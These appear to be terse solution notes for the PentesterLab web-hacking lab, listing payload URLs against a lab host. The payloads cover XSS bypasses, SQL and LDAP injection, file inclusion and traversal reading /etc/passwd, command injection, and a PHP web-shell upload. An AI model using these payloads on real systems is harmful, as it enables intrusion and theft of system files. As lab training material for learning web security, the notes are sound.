https://www.pentesterlab.com/exercises/
http://192.168.1.34/xss/example3.php?name=%3Cscrip%3Cscript%3Et%3Ealert(%27toto%27)%3C/%3Cscript%3Escrip%3C/script%3Et%3E
http://192.168.1.34/xss/example4.php?name=%3Cbutton%20onclick=%22alert(%27tg%27)%22%3Eclick%20me%20mofo%3C/button%3E
http://192.168.1.34/xss/example5.php?name=%3Cscript%3Eeval(%22blert(%27toto%27)%22.replace(%22b%22,%22a%22))%3C/script%3E
http://192.168.1.34/xss/example6.php?name=%22;alert(%27tg%27);//
http://192.168.1.34/xss/example7.php?name=%27;%20alert(%27tg%27);//
http://192.168.1.34/xss/example8.php/%22%3E%3Cscript%3E%20onclick=alert('toto')%3C/script%3E
http://192.168.1.34/xss/example9.php#<script>alert('toto')</script>
http://192.168.1.34/ldap/example1.php
http://192.168.1.34/ldap/example2.php?name=a*))%00&password=bla
http://192.168.1.34/sqli/example1.php?name=%27%20or%20%271%27=%271
http://192.168.1.34/sqli/example2.php?name=%27%09or%09%271%27=%271
http://192.168.1.34/sqli/example3.php?name=%27/**/or/**/%271%27=%271
http://192.168.1.34/sqli/example4.php?id=1%20OR%20id!=2
http://192.168.1.34/sqli/example5.php?id=2%20or%20id!=2
http://192.168.1.34/sqli/example6.php?id=2%20or%20id!=2#123
http://192.168.1.34/sqli/example7.php?id=2%0aor%20id!=2
http://192.168.1.34/sqli/example8.php?order=age`%20DESC%23
http://192.168.1.34/sqli/example9.php?order=IF(1,id,id)
http://192.168.1.34/fileincl/example1.php?page=http://www.google.fr
http://192.168.1.34/fileincl/example1.php?page=../../../../../../../etc/passwd
http://192.168.1.34/fileincl/example2.php?page=http://google.fr?foo=
example1: upload toto.html containing "<script>alert('lol');</script>" or upload tg.php containing "<?php system($_GET["cmd"]);?>"
example2: toto.html still works; tg.php is filtered, rename it to tg.php3
http://192.168.1.34/commandexec/example1.php?ip=google.fr;cat%20/etc/passwd
http://192.168.1.34/commandexec/example2.php?ip=mustcontain%0a127.0.0.1%0als
echo "GET /commandexec/example3.php?ip=||ls;" | nc 192.168.1.34 80
http://192.168.1.34/dirtrav/example1.php?file=../../../../../../etc/passwd
http://192.168.1.34/dirtrav/example2.php?file=/var/www/files/../../../../etc/passwd
http://192.168.1.34/dirtrav/example3.php?file=../../../../../etc/passwd%00